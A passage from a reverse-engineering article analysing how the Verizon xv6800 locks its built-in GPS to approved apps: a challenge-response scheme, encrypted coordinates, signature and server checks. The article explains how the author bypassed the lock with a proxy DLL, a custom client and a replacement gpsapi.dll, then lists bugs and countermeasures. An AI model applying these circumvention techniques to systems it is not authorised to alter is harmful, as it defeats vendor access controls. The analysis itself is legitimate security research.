of new features previously unavailable on the device on the initial release
firmware. In particular, support for accessing the device's built-in Qualcomm
gpsOne assisted GPS chipset was introduced with this update. However, Verizon
Wireless elected to attempt to lock down the GPS hardware on xv6800 such that
only applications authorized by Verizon Wireless would be able to access the
device's built-in GPS hardware and perform location-based functions (such as
GPS-assisted navigation). The mechanism used to lock down the GPS hardware is
entirely client-side based, however, and as such suffers from fundamental
limitations in terms of how effective the lockdown can be in the face of an
almost fully user-programmable Windows Mobile-based device. This article
outlines the basic philosophy used to prevent unauthorized applications from
accessing the GPS hardware and provides a discussion of several of the flaws
inherent in the chosen design of the protection mechanism. In addition,
several pitfalls relating to debugging and reverse engineering programs on
Windows Mobile are also discussed. Finally, an overview of several suggested
design alterations that would have mitigated some of the flaws in the current
GPS lock down system from the perspective of safeguarding the privacy of user
location data are also presented.
1. Introduction
The Verizon Wireless xv6800 (which is in and of itself a rebranded version of
the HTC Titan, with a carrier-customized firmware loadout) is a recently
released Windows Mobile-based smartphone. A firmware update released during
August 2008 enabled several new features on the device. For the purposes of
this article, the author has elected to focus on the embedded Qualcomm gpsOne
chipset, which provides assisted GPS facilities to applications running on the
device.
With the official firmware upgrade (known as MR1), the assisted GPS support on
the device, which had previously remained inaccessible when using carrier-
supported firmware, was activated, albeit with a catch; only applications that
were approved by Verizon Wireless were able to access the built-in GPS hardware
present on the device. Although third-party applications could access an
externally connected (for example, Bluetooth-enabled) GPS device, the Qualcomm
gpsOne chipset embedded in the phone itself remained inaccessible. Coinciding
with the public release of the xv6800 MR1 firmware, Verizon Wireless also began
making available a subscription-based application (called "VZ Navigator"),
which provides voice-based turn-by-turn navigation on the xv6800 via the usage
of the device's built-in GPS hardware.
There have been a variety of third-party firmware images released for the
xv6800 that mix-and-match portions of official firmware releases from other
carriers supporting their own rebranded versions of xv6800 (HTC Titan). Some
of these custom firmware images enable access to the gpsOne hardware, albeit
with several caveats. In particular, until recently, assisted GPS mode, wherein
the cellular network aids the device in acquiring a GPS fix, was not available
on Verizon Wireless's network with custom firmware images; only standalone GPS
mode (which requires waiting for a "cold lock" on three GPS satellites, a
process that may take many minutes after device boot) was enabled. In
addition, installing these custom firmware images requires patching out a
signature check in the software loader on the device. This procedure may be
considered dangerous if one wishes to retain hardware warranty support (which
may be desirable, given the steep unsubsidized cost of the device).
Furthermore, should one install the official Verizon Wireless MR1 firmware
upgrade, the gpsOne hardware on the device would remain locked down even if one
switched to a currently available third-party firmware images. This
is likely due to a sticky setting written to the firmware during the carrier
provisioning process at the completion of the MR1 firmware upgrade. As the
presently available third-party ROM images do not wipe the area of the device's
firmware which seems to control the GPS hardware's lockdown state, it becomes
difficult to unlock the GPS hardware after having upgraded to the MR1 firmware
image. A lengthy process is available to undo this change, but it involves
the complete reset of most provisioning settings on the device, such that the
phone must be partially manually reprovisioned, as opposed to utilizing the
over-the-air provisioning support.
Given the downsides of relying on custom firmware images for enabling the
built-in GPS hardware on the xv6800, the official firmware release does pose a
reasonable attraction. However, the locking down of the GPS hardware to only
Verizon Wireless authorized applications is undesirable should one wish to use
third-party location-enabled applications with the built-in GPS hardware, such
as Google Maps or Microsoft's Live Search.
Verizon Wireless indicates that third-party application usage of the GPS
hardware on their devices is subject to Verizon Wireless-dictated policies and
procedures [1]. In particular, the security of user location information is
often cited [2] as a reason for requiring location-enabled applications to be
certified by Verizon Wireless. Unfortunately, the mechanism deployed to lock
built-in GPS hardware on the xv6800 provides very little in the way of true
security against third-party programs (malicious or otherwise) from accessing
location information. In fact, given Windows Mobile 6's lack of "hard" process
isolation, it is questionable as to whether it is even technically feasible to
provide a truly secure protection mechanism on a device that allows
user-supplied programs to be loaded and executed.
While there may be golden intentions in attempting to protect users from
malicious programs designed to harvest their location information on-the-fly,
the protection system as implemented to control access to the gpsOne chipset
on the xv6800 is unfortunately relatively weak. This is at odds with Verizon
Wireless's stated goals of attemting to protect the security of a user's location
information, and thus may place users at risk.
2. Overview of Protection Mechanisms
There are multiple levels of protection mechanisms built-in to both the MR1
firmware image for the xv6800, as well as the GPS-enabled subscription VZ
Navigator software that Verizon Wireless supports as the sole officially
sanctioned location-based application (at the time of this article's writing).
The protection mechanisms can be broken up into those that exist on the device
firmware itself, and those that exist in the VZ Navigator software.
2.1. Firmware-based Protection Mechanisms
The MR1 firmware provides the underlying foundation of the built-in GPS
hardware lockdown logic. There are several built-in software components that
are "baked into" the firmware image and support the GPS lockdown system. The
principle design underpinning the firmware-based protection system, however, is
a fairly run of the mill security-through-obscurity based approach. In
particular, GPS location information obtained by the built-in gpsOne hardware
(specifically, latitude and longitude) is encrypted. Only programs that
understand how to decrypt the position information are able to make sense of
any data returned by the gpsOne chipset.
Furthermore, in order to initiate a location fix via the built-in gpsOne
hardware, an application must continually answer correctly to a series of
challenge-response interactions with the gpsOne chipset driver (and thus the
radio firmware on the device). The reason for implementing both a
challenge-response mechanism as well as obfuscating the actual GPS location
will become apparent after further discussion.
The firmware-based protected gpsOne interface has several constituent layers,
with supporting code present at radio-firmware level, kernel driver level, and
user mode application level.
At the lowest level, the radio firmware for the device chipset would appear to
have a hand in obfuscating returned GPS positioning data. This assumption is
logically based on a strings dump of radio firmware images indicating the
presence of AES-related calls in GPS-related code (AES is used to encrypt the
returned location information), and the fact that switching to a custom
firmware image after installing the MR1 update does not re-enable the plaintext
gpsOne interface).
Between the radio firmware (which executes outside the context of Windows
Mobile) and the OS itself, there exists a kernel mode Windows Mobile driver
known as the GPS intermediate driver. This module (gpsid_qct.dll) provides an
interface between user mode callers and the GPS hardware on the device. It
also provides support for multiplexing a single piece of GPS hardware across
multiple user mode applications concurrently (a standard feature of Windows
Mobile's GPS support). However, Verizon Wireless has broken this support with
the locked down GPS logic that has been placed in the xv6800's implementation
of the GPS intermediate driver.
Beneath the GPS intermediate driver, there are two different interfaces that
are supported for the collection of location data on Windows Mobile-based
devices [4]. The first of these is an emulated serial port that is exposed to
user mode, and implements a standard NMEA-compatible text-based interface for
accessing location information. This interface has also been broken by the
GPS intermediate driver used by Verizon Wireless on the xv6800, for reasons
that will become clear upon further discussion.
The second interface for retrieving location information via the GPS
intermediate driver is a set of IOCTLs implemented by the GPS intermediate
driver to retrieve parsed (binary) GPS data from the currently-active GPS
hardware (returned as C-style structures). User mode callers do not typically
call these IOCTLs directly from their code, but instead indirect through a set
of thin C API wrappers in a system-supplied module called gpsapi.dll. This
interface is also broken by the GPS lockdown logic in the GPS intermediate
driver, although an extended version of this IOCTL-based interface is used by
GPS-enabled applications that support the locked down mode of operation on the
xv6800.
Verizon Wireless ships a custom module parallel to gpsapi.dll on the xv6800,
named oemgpsOne.dll. This module exports a superset of the APIs provided by
the standard gpsapi.dll (although there are slight differences in function
names). Additionally, new APIs (which are, as in gpsapi.dll, simply thin
wrappers around IOCTL requests sent to the GPS intermediate driver) are
provided to manage the challenge-response and encrypted GPS location aspects
of the gpsOne lockdown system present on the xv6800. Through correct usage of
the APIs exported by oemgpsOne.dll, a program with knowledge of the GPS lock
down system can retrieve valid positioning data from the gpsOne chipset on the
device.
Applications that are approved by Verizon Wireless for location-enabled
operation make calls to a library developed by Verizon Wireless and Autodesk,
named LBSDriver.dll, which is itself a client of oemgpsOne.dll. LBSDriver.dll
and its security measures are discussed later, along with VZ Navigator.
2.1.a. Application Authorization via Challenge-response
In order to activate the gpsOne hardware on the xv6800 and request a GPS
location fix, an application must receive a challenge data block from the
gpsOne driver and perform a secret transform on the given data in order to
create a well-formed response. Until this process is completed, the gpsOne
hardware will not attempt to return a location fix. Furthermore, a
location-enabled application using the built-in gpsOne hardware must
continually complete additional challenge-response sequences (using the same
underlying algorithms) as it continues to acquire updated location fixes from
the gpsOne hardware.
The first step in connecting to the GPS intermediate driver to retrieve valid
position information is to open a handle to a GPS intermediate driver instance.
This is accomplished with a call to an oemgpsOne.dll export by the name of
oGPSOpenDevice. The parameters and return value of this function are analogous
to the standard Windows Mobile GPSOpenDevice routine [5].
HANDLE
oGPSOpenDevice(
__in HANDLE NewLocationData,
__in HANDLE DeviceStateChange,
__in const WCHAR *DeviceName,
__in DWORD Flags
);
After a handle to the GPS intermediate driver instance is available, the next
step in preparing for the challenge-response sequence is to issue a call to
a second function implemented by oemgpsOne.dll, named oGPSGetBaseSSD.
This routine returns a session-specific blob of data that is later used in the
challenge-response process. In the current implementation, the returned blob
appears to always contain the same data across every invocation.
DWORD
oGPSGetBaseSSD(
__in HANDLE Device,
__out unsigned char *Buf, // sizeof = 0x10
__out unsigned long *BufLength, // 0x10
__out unsigned short *Buf2 // sizeof = 0x10
);
Next, the GPS intermediate driver must be provided with a valid event handle to
signal when a new challenge cycle has been requested by the driver. This is
accomplished via a call to the oGPSEnableSecurity function in oemgpsOne.dll.
DWORD
oGPSEnableSecurity(
__in HANDLE Device,
__in HANDLE SecurityChangeEvent
);
After the session-specific blob has been retrieved, and an event handle for
new challenge requests has been provided to the GPS intermediate driver, the
next step is to receive a challenge block from the GPS intermediate driver and
compute a valid response. The application must wait until the GPS intermediate
driver signals the challenge request event before requesting the current
challenge data block. Once the driver signals the event that was passed to
oGPSEnableSecurity, the application must execute one challenge-response cycle.
Challenge data blocks are retrieved from the gpsOne driver via a call to a
routine exported from oemgpsOne.dll, named oGPSReadSecurityConfig. As per the
prototype, this routine takes a handle to the GPS intermediate driver instance,
and returns a blob of data used to generate a challenge response.
DWORD
oGPSReadSecurityConfig(
__in HANDLE Device,
__out unsigned char *Buf // On return, 0x4 + 1 + 1 + Buf[0x6] (max length 0x1c total)
);
After the challenge data blob has been retrieved via a call to
oGPSReadSecurityConfig, the GPS lockdown-aware application must perform a
series of secret transformations on it before indicating a companion response
blob down to the GPS intermediate driver. The transformation function consists
of some bit-shuffling of the challenge blob, followed by a SHA-1 hash of the
shuffled challenge blob concatenated with the session-specific data blob. This
process yields the bulk of the response data less a two-byte header that is
prepended prior to indication down to the GPS intermediate driver.
The process of sending the computed challenge-response is accomplished via a
call to another function in oemgpsOne.dll, by the name of
oGPSWriteSecurityConfig.
DWORD
oGPSWriteSecurityConfig(
__in HANDLE Device,
__in unsigned char *Buf // 0x1C
);
The GPS intermediate driver will continue to periodically challenge the
application while it requests updated position fixes from the gpsOne chipset.
This is accomplished by signaling the event passed to oGPSEnableSecurity, which
indicates to the application that it should retrieve a new challenge and create
a new response, using the mechanism outlined above.
2.1.b. Location Information Encryption
Without passing the challenge-response scheme previously described, the GPS
intermediate driver will refuse to return a set of position information from
the gpsOne hardware. Even after the challenge-response system has been
implemented, however, a secondary layer of security must be addressed. This
security layer takes the form of the encryption of the latitude and longitude
values returned by the gpsOne chipset.
While this second layer of security may appear superfluous at first glance,
there exists a valid reason for it. Recall that the GPS intermediate driver
multiplexes a single piece of GPS hardware across multiple applications. In
the implementation of the current GPS intermediate driver for the xv6800, the
challenge-response scheme appears to map directly to the gpsOne chipset itself.
Thus, once a single program has passed the challenge-response mechanism, and as
long as that program continues to respond correctly to challenge-response
requests, any program on the system can call any of the standard Windows Mobile
GPS interfaces to retrieve location data. This presents the obvious security
hole wherein a Verizon Wireless-approved GPS application is started, and then a
third-party application using the standard Windows Mobile GPS API is loaded,
in effect "piggy-backing" on top of the challenge-response code residing in the
approved application to allow access to the embedded gpsOne hardware.
For reasons unclear to the author, the designers of the GPS lockdown system
did not choose to simply disable GPS requests not associated with the program
that has passed the challenge-response scheme. Instead, a different approach
is taken, such that the GPS intermediate driver encrypts the location
information that it returns via either serial port or gpsapi.dll interfaces.
In order to make sense of the returned latitude and longitude values, a program
must be able to decrypt them. While the GPS intermediate driver provides the
decryption key in plaintext equivalent to any program that knows how to request
it, this information is not available to clients of the standard Windows Mobile
NMEA-compatible virtual serial port or gpsapi.dll interfaces. Aside from
latitude and longitude data, however, all other information returned by the
standard Windows Mobile GPS interface is unadulterated and valid (this includes
altitude and timing information, primarily).
Thus, the first step to decoding valid position values is to call an extended
version of the standard Windows Mobile GPSGetPosition routine [6]. This
extended routine is named oGPSGetPosition, and it, too, is implemented in
oemgpsOne.dll. The prototype matches that of the standard GPSGetPosition,
although an extended version of the GPS_POSITION structure containing
additional information (including a blob needed to derive the decryption key
required to decrypt the longitude and latitude values) is returned.
DWORD
oGPSGetPosition(
__in HANDLE Device,
__out PGPS_POSITION GPSPosition,
__in DWORD MaximumAge,
__in DWORD Flags
);
Decryption of the latitude and longitude information is fairly straight-
forward, involving a transform (via the same transformation process described
previously) of the challenge data returned as a part of the extended
GPS_POSITION structure. This yields an AES key, which is imported into a
CryptoAPI key object, and then used in ECB mode to decrypt the latitude and
longitude values.
Once decryption is complete, a scaling factor is then applied to the resultant
coordinate values, in order to bring them in line with the unit system used by
the standard Windows Mobile GPS interfaces.
2.2.b. VZ Navigator (Application-level) Protection Mechanisms
While many parts of the GPS lockdown system are implemented by radio firmware-
level, or kernel mode-level code, portions are also implemented in user mode.
An approved Verizon Wireless application accesses location information by
calling through a module developed by Verizon Wireless and Autodesk, and named
LBSDriver.dll. In an approved application, it is the responsibility of
LBSDriver.dll to communicate with the GPS intermediate driver via
oemgpsOne.dll, and implement the challenge-response and position decryption
functionality. LBSDriver.dll then exports a subset of the standard Windows
Mobile gpsapi.dll (with several custom additions), for usage by approved
programs on the xv6800.
Additionally, LBSDriver.dll implements a user-controlled privacy policy on top
of the gpsOne hardware. The user is allowed to specify at what times of day a
particular program can access location information, and whether the user is
prompted to confirm the request. The privacy policy configuration process is
driven via a dialog box (implemented and created by LBSDriver.dll) that is
shown on the device the first time an application runs, and subsequently via
a Verizon Wireless-operated web site [7]. Privacy policy settings are
obfuscated and stored in the registry, keyed off of a hash of the calling
program's main process image fully-qualified filename.
Because LBSDriver.dll is a standard, loadable DLL, it is vulnerable to being
loaded by untrusted code. There are several defenses implemented by the
LBSDriver module which attempt to deter third-party programs that have not been
approved by Verizon Wireless from successfully loading LBSDriver.dll and
subsequently using it to access location information.
The first such protection embedded into LBSDriver.dll is a digital signature
check on the main process executable corresponding to any program that attempts
to load LBSDriver.dll. This check is ultimately triggered when the
GPSOpenDevice export on LBSDriver.dll is called. Specifically, the calling
process module is confirmed to be signed by a custom certificate. If this is
not the case, then an error dialog is shown, and the GPSOpenDevice request is
denied. This check is based on calling GetModuleFileName(NULL, ...) [8] to
retrieve the path to the main process image, which is then run through the
aforementioned signature check.
Additionally, LBSDriver.dll also connects to an Autodesk-operated server in
order to determine if the calling program is authorized to use LBSDriver.dll.
In addition to verifying that the calling program is approved as a GPS-enabled
application, the Autodesk-operated server also appears to indicate back to the
client whether or not the user's account has been provisioned for a
subscription location-enabled application, such as VZ Navigator. A program
hoping to utilize LBSDriver.dll must pass these checks in order to successfully
acquire a location fix using the built-in gpsOne hardware.
The Autodesk-operated server also provides configuration information (such as
Position Determining Entity (PDE) addresses) that is later used in the assisted
GPS process. However, this configuration information appears to be more or
less static, at least for the critical portions necessary to enable assisted
GPS, and can thus be cached and reused by third-party programs without even
needing to go through the Autodesk server.
3. Opening gpsOne on the xv6800 to Third-party Applications.
Understanding the protection mechanisms that implement the locking down of the
built-in GPS hardware is only part of the battle to enable third-party
GPS-enabled programs to operate on the xv6800. Undocumented functions in
oemgpsOne.dll with no equivalent in the standard Windows Mobile gpsapi.dll, and
various quirks of Windows Mobile itself preclude a straightforward
implementation to unlock the GPS for third-party programs.
Furthermore, third-party GPS-enabled programs are written to one (or commonly,
both) of the standard Windows Mobile GPS interfaces. Because these interfaces
are disabled on the xv6800, a solution to adapt third-party programs to the
locked down GPS interface would be required (in lieu of modifying every single
third-party application to support the locked down GPS interface). As many of
these third-party applications are closed-source and frequently updated, any
solution that required direct modification of a third-party program would be
untenable from a maintenance perspective.
The solution chosen was to write an emulation layer for the standard Windows
Mobile gpsapi.dll interface, which translates standard gpsapi.dll function
calls into requests compatible with the locked down GPS interface.
3.1. Examining gpsOne Driver Interactions
The first step in implementing a layer to unlock the gpsOne hardware on the
xv6800 involves discovering the correct sequence of oemgpsOne.dll calls (and
thus calls to the GPS intermediate driver, as oemgpsOne.dll is merely a thin
wrapper around IOCTL requests to the GPS intermediate driver, for the most
part, with some minor exceptions).
The standard way that this would be done on a Windows-based system would be to
run VZ Navigator under a debugger, but there exist several complications that
prevent this from being an acceptable solution for monitoring oemgpsOne.dll
requests.
First, the assisted GPS functionality of the gpsOne hardware requires that the
device be connected to the cellular network, and operating with it as the
default gateway, as a connection to a carrier-supplied server (known as a
"Position Determining Entity", or PDE) must be made. The PDE servers that are
operated by Verizon Wireless are firewalled off from outside their network, and
in addition, it is possible that they use the IP address assigned to the user
making a request for location assistance purposes.
Unfortunately, the debugger connection to a Windows Mobile-based device, for
all the Windows Mobile debuggers that the author had access to (IDA Pro 5.1 and
the Visual Studio 2005 debugger) require an ActiveSync link. While the
ActiveSync link is enabled, it supersedes the cellular link for data traffic.
Even when the computer on the other end of the ActiveSync link was connected to
the cellular network via a separate cellular modem, the GPS functionality did
not operate, due to an apparent check of whether the cellular link is the most-
precedent data link on the device.
This means that observing much of the oemgpsOne.dll calls relating to position
fixes would not be possible with the standard debugging tools available. The
solution that was implemented for this problem was to write a proxy DLL that
exports every symbol exported by oemgpsOne.dll, logs the parameters of any such
API calls, and then forwards them on to the underlying oemgpsOne.dll
implementation (logging return values and out parameters after the actual
implementation function in question returned).
While potentially labor-intensive, in terms of creating the proxy DLL, such a
technique is relatively simple on Windows. The usual procedure for such a task
would be to create the proxy DLL, place it in the directory containing the main
process image of the program to be hooked, and then load the real DLL with a
fully-qualified path name from inside the proxy DLL.
Unfortunately, Windows Mobile does not allow two DLLs with the same base name
to be loaded, even if a fully-qualified path is specified with a call to
LoadLibrary. Instead, the first DLL that happened to get loaded by any process
on the entire system matching the requested base name is returned. This means
that in order to load a proxy DLL, one of two approaches would need to be
taken.
The first such option is to rename the the proxy DLL itself, along with the
filename of the imported DLL in the desired target module, by modifying the
actual desired target module itself on-disk. The second option is to rename
the DLL containing the implementation of the proxied functionality, and then
load that DLL by the altered name in the proxy DLL. Both approaches are
functionally equivalent on Windows Mobile; the author chose the former in
this case.
Through disassembly, a rough estimate of the prototypes of the various APIs
exported by oemgpsOne.dll was created, and from there, a proxy module
(oemgpsOneProxy.dll) was written to log specific API calls to a file for later
analysis. This approach allowed for relatively quick identification of any
arguments to oemgpsOne.dll calls which were not immediately obvious from static
disassembly, despite the lack of a debugger on the target when many of the
calls were made.
3.2. Implementing a Custom oemgpsOne.dll client
After discerning the prototypes for the various oemgpsOne.dll supporting APIs,
the next step in unlocking the built-in GPS hardware on the xv6800 was to write
a custom client program that utilized oemgpsOne.dll to retrieve decrypted
location values from the gpsOne chipset.
Although one approach to this task might be to attempt to disable the various
security checks present in LBSDriver.dll, it was deemed easier to re-implement
an oemgpsOne.dll client from scratch. In addition, this approach also allowed
the author to circumvent various implementation bugs and limitations present
in LBSDriver.dll.
Given the information gleaned from analyzing LBSDriver.dll's implementation of
the challenge-response and GPS decryption logic, and the API call logging from
the oemgpsOne.dll proxy module, writing a client for oemgpsOne.dll is merely an
exercise in writing the necessary code to connect all of the pieces together in
the correct fashion.
After valid GPS position data can be retrieved from oemgpsOne.dll, all that
remains is to write an adapter layer to connect programs written against the
standard Windows Mobile gpsapi.dll to the custom oemgpsOne.dll client.
However, there are inherent design limitations in the locked down GPS interface
that complicate the creation of a practical adapter to convert gpsapi.dll calls
into oemgpsOne.dll calls. For example, a naive implementation that might
involve creating a module to replace gpsapi.dll with a custom binary to make
inline calls to oemgpsOne.dll would run aground of a number of pitfalls.
Specifically, as oemgpsOne.dll depends on gpsapi.dll, attempting to simply
replace gpsapi.dll with a custom module will break the very oemgpsOne.dll
functionality used to communicate with the GPS intermediate driver, due to
the previously mentioned "one dll for a given base name" Windows Mobile
limitation. In addition, it is not possible for two programs to simply
simultaneously operate full clients of oemgpsOne.dll, as the challenge-response
mechanism operates globally and will not operate correctly should two
applications simultaneously attempt to engage it.
The most straightforward solution to the former issue is to simply rename a
copy of the stock gpsapi.dll, and then modify oemgpsOne.dll to refer to the
renamed gpsapi.dll. This opens the door to replacing the system-supplied
gpsapi.dll with a custom replacement gpsapi.dll implementing a client for
oemgpsOne.dll.
3.3. Multiplexing GPS Across Multiple Applications.
The GPS intermediate driver supports multiplexing the GPS hardware present on
a Windows Mobile-based device across multiple applications. However, as
previously noted, the locked down GPS interface breaks this functionality, as
no two programs can participate in the full challenge-response protocol for
keeping the gpsOne hardware active simultaneously.
Although the first program to start could be designated the "master", and thus
be responsible for challenge-response operations (with secondary programs
merely decrypting position data locally), this introduces a great deal of extra
complexity. Specifically, significant coordination issues arise relating to
cleanly handling the fact that third-party GPS-enabled programs are typically
unaware of each other. Thus, work must be done to handle the case where one
program having previously activated the gpsOne hardware exits, leaving any
remaining programs still using GPS with the problem of selecting a new "master"
program to perform challenge-responses with the GPS intermediate driver.
Given the difficulties of such an approach, a different model was chosen, such
that the replacement gpsapi.dll acts as a client of a server program which then
mediates access to the locked down GPS interface on behalf of all active GPS-
enabled programs. Although there exist synchronization and coordination issues
with this model, they are simpler to deal with than the alternative
implementation.
3.4. Caveats.
While the resultant GPS adapter system supports third-party programs that
utilize gpsapi.dll, any programs using the virtual NMEA serial port interface
will not operate successfully. Unfortunately, the same approach towards the
replacement of gpsapi.dll is not feasible with the APIs utilized in
communication with a serial port, by virtue of the sheer number of function
calls present in coredll.dll that would need to be forwarded on to the real
coredll.dll via a proxy module.
4. Bugs in the Verizon Wireless xv6800 gpsOne Lock Down Logic
Few programs designed to lockdown portions of a system via security through
obscurity are bug-free, and the GPS lockdown logic on the xv6800 is certainly
no exception. The lockdown code has a number of localized and systemic issues
pervading the current implementation.
4.1. Thread Safety Issues
There are a number of threading related issues present throughout the locked
down GPS interface.
- The GPS intermediate driver does not properly synchronize the case of
multiple simultaneous callers using the extended IOCTLs not present on a
stock GPS intermediate driver implementation.
- LBSDriver.dll utilizes a dedicated thread for performing challenge-response
processing with the GPS intermediate driver. However, there is no
synchronization provided between the challenge-response thread and the thread
that retrieves and decrypts GPS position data, leading to a race condition in
which it might be possible for decryption to return garbage data.
4.2. API Mis-use
In several cases, LBSDriver.dll fails to use standard Windows APIs correctly.
- LBSDriver.dll performs dangerous operations in DllMain, such as loading
other DLLs, despite such operations being long-documented as blatantly
illegal and prone to difficult to diagnose deadlocks (particularly on a
device with extremely limited debugging support).
- When LBSDriver.dll performs the AES decryption on the latitude/longitude
values returned by oemgpsOne.dll, it creates a CryptoAPI key blob, in order
to import the derived AES key into a CryptoAPI key object (via the use of the
CryptImportKey routine). However, the length of the key blob passed to
CryptImportKey is actually too short. This would appear to make
LBSDriver.dll seemingly dependent on a bug in the Windows Mobile 6
implementation of CryptoAPI. Specifically, the key blob format for a
symmetric key includes a count in bytes of key material, and the data passed
to CryptImportKey is such that the key blob structure claims to extend beyond
the length of bytes that LBSDriver.dll specifies for the key blob structure
itself. It might even be the case that this represents a security problem in
CryptoAPI due to apparently non-functional length checking in this case, as
key blobs are documented to be transportable across an untrusted medium.
To illustrate second issue, consider the following code fragment:
//
// Initialize the header.
//
BlobHeader = (BLOBHEADER *)KeyBlob;
BlobHeader->bType = PLAINTEXTKEYBLOB;
BlobHeader->bVersion = 2;
BlobHeader->reserved = 0;
BlobHeader->aiKeyAlg = CALG_AES_128;
//
// Initialize the key length in the BLOB payload.
//
*(DWORD *)(&KeyBlob[ 0x08 ] ) = KeyLength;
//
// Initialize the key material in the BLOB payload.
//
memcpy( KeyBlob + 0x0C, KeyData, KeyLength );
//
// Generate a CryptoAPI AES-128 key object from our key material.
//
if (!CryptImportKey(
CryptProv,
KeyBlob,
KeyLength, // BUGBUG: Should really be KeyLength + 0x0C...
NULL,
0,
&Key))
{
break;
}
Contrary to the Microsoft-supplied documentation [9] for CryptImportKey, the
third parameter passed to CryptImportKey ("dwDataLen", as "KeyLength" in this
example) is too short for the key blob specified, as the length field in the
blob header itself describes the key material as being "KeyLength" bytes.
Thus, the LBSDriver.dll module would appear to depend upon either CryptoAPI or
the default Microsoft cryptographic provider on Windows Mobile not validating
blob header key material lengths properly, as the supplied blob header claims
that the key material extends outside the provided blob buffer (given the
length passed to CryptImportKey).
Microsoft-supplied sample code [10] illustrates the correct construction of a
symmetric key blob, and does not suffer from this deficiency.
5. Suggested Countermeasures
Although several attempts were made throughout the GPS lockdown system on the
xv6800 to deter third party programs from successfully communicating with the
integrated gpsOne hardware, the bulk of these checks were relatively easy to
overcome. In fact, the principle barriers to the GPS unlocking projects were
a lack of viable debugging tools for the platform, and an unfamiliarity with
Windows Mobile on the part of the author.
Nevertheless, several improvements could have been made to improve the
resilience of the lockdown system.
- Deny assisted GPS availability at the PDE if the user's account is not
provisioned for GPS, or if the privacy policy configured time of day
restrictions are not met. Because the security and lockdown checks are
implemented client-side on the xv6800, they are relatively easily bypassable
by third party applications. However, if the device is capable of performing
a standalone GPS location fix, blocking assisted GPS access will not provide
a hard defense.
- Require code signing from a Verizon Wireless CA for all applications loaded
on the device. Users are, however, unlikely to purchase a device configured
in such a matter, as expensive smartphone-class devices are often sold under
the expectation that third party programs will be easily loadable.
- Moving enforcement checks for operations such as time of day requirements for
the user's desired location privacy policy into the radio firmware and out of
the operating system environment. The radio firmware environment is
significantly closer to a "black box" than the operating system which runs on
the application core of the xv6800. Furthermore, if the software loader on
the xv6800 were secured and locked down, the radio firmware could be made
significantly more proof against unauthorized modifications. One could
envision a system wherein the radio firmware communicates with the carrier's
network out-of-band (with respect to the general-purpose operating system
loaded on the device) to determine when it had been authorized by the user to
provide location information to applications running on the device.
The client-side checks on the GPS lockdown system are likely a heritage of the
fact that VZ Navigator and LBSDriver.dll appear to be more or less ports from
BREW-based "dumb phones", where the application environment is more tightly
controlled by code signing requirements. The Windows Mobile operating
environment is significantly different in this respect, however.
Additionally, the author would submit that, from the perspective of attempting
to safeguard users from unauthorized harvesting of their location data (a key
reason cited by Verizon Wireless with respect to the certification process
needed for an application to become approved for location-aware functionality),
a hardware switch to enable or disable the GPS hardware on the device would be
a far better investment. In fact, the xv6800 already possesses a hardware
switch for 802.11 functionality; if this was instead changed to enable or
disable the gpsOne chipset in future smartphone designs, users could be assured
that their location information would be truly secure.
6. Debugging and Development Challenges on Windows Mobile and the xv6800.
Windows Mobile has a severely reduced set of standard debugging tools as
compared to the typically highly rich debugging environment available on most
Windows-derived systems. This greatly complicated the process of understanding
the underlying implementation details of the GPS lockdown system.
The author had access to two debuggers that could be used on the xv6800 at the
time of this writing: the Visual Studio 2005 debugger, and the IDA Pro 5.1
debugger. Both programs have serious issues in and of their own respective
rights.
Unfortunately, there does not appear to be any support for WinDbg, the author's
preferred debugging tool, when using Windows CE-based systems, such as Windows
Mobile. Although WinDbg can open ARM dump files (and ARM PE images as a dump
file), and can disassemble ARM instructions, there is no transport to connect
it to a live process on an ARM system.
The relatively immature state of debugging tools for the Windows Mobile
platform was a significant time consumer in the undertaking of this project.
6.1. Limitations of the Visual Studio Debugger
Visual Studio 2005 has integrated support for debugging Windows Mobile-based
applications. However, this support is riddled with bugs, and the quality of
the debugging experience rapidly diminishes if one does not have symbols and
binaries for all images in the process being debugged present on the debugger
machine. In particular, the Visual Studio 2005 debugger seems to be unable to
disassemble at any location other than the current pc register value without
having symbols for the containing binary available. (In the author's
experience, attempting such a feat will fail with a complaint that no code
exists at the desired address.)
Additionally, there seems to be no support for export symbols on the Windows
Mobile debugger component of Visual Studio 2005. This, coupled with the lack
of freely-targetable disassembly support, often made it difficult to identify
standard API calls from the debugger. The author recommends falling back to
static disassembly whenever possible, as available static disassembly tools,
such as IDA Pro 5.1 Advanced or WinDbg provide a superior user experience.
6.2. Limitations of the IDA Pro 5.1 Debugger
Although IDA Pro 5.1 supports debugging of Windows Mobile-based programs, the
debugger has several limitations that made it unfortunately less practical than
the Visual Studio 2005 debugger. Foremost, it would appear that the debugger
does not support suspending and breaking into a Windows Mobile target without
the Windows Mobile target voluntarily breaking in (such as by hitting a
previously defined breakpoint).
In addition, the default security policy configuration on the device needed to
be modified in order to enable the debugger to connect at all (see note [3]).
6.3. Replacing a Firmware-baked Execute-in-place Module
Windows Mobile supports the concept of an execute in place (or XIP) module.
Such an executable image is stored split up into PE sections on disk (and does
not contain a full image header). XIP modules are "baked" into the firmware
image, and cannot be overwritten without flashing the OS firmware on the
device. Conversely, it is not possible to simply copy an XIP module off of the
device and on to a conventional storage medium.
The advantage of XIP "baked" modules comes into play when one considers the
limited amount of RAM available on a typical Windows Mobile device. XIP
modules are pre-relocated to a guaranteed available base address, and do not
require any runtime alterations to their backing memory when mapped. As a
result, XIP modules can be backed entirely by ROM and not RAM, decreasing the
(scarce) RAM that must be devoted to holding executable code.
It is possible to supersede an XIP "baked" module without flashing the OS image
on the xv6800, however. This involves a rather convoluted procedure, which
amounts to the following steps, for a given XIP module residing in a particular
directory:
- First, rename the replacement module such that it has a filename which does
not conflict with any files present in the directory containing the XIP
module to supersede.
- Next, copy the renamed replacement module into the directory containing the
desired XIP module to supersede.
- Finally, rename the replacement module to have the same filename as the
desired XIP module.
Deleting the filename associated with the superseded XIP module will revert the
device back to the ROM-supplied XIP module. This property proves beneficial in
that it becomes easy to revert back to stock operating system-supplied modules
after temporarily superseding them.
6.4. Import Address Table Hooking Limitations
One avenue considered during the development of the replacement gpsapi.dll
module was to hook the import address tables (IATs) of programs utilizing
gpsapi.dll.
Unfortunately, import table hooking is a significantly more complicated affair
on Windows Mobile-based platforms than on standard Windows. The image headers
for a loaded image are discarded after the image has been mapped, and the IAT
itself is often relocated to be non-contiguous with the rest of the image.
This relocation is possible as there appears to be an implicit restriction
that all references to an IAT address on ARM PE images must indirect through a
global variable that contains the absolute address of the desired IAT address.
As a result, there are no relative references to the IAT, and thus absolute
address references may be fixed up via the aid of relocation information. It
is not clear to the author what the purpose for this relocation of the IAT
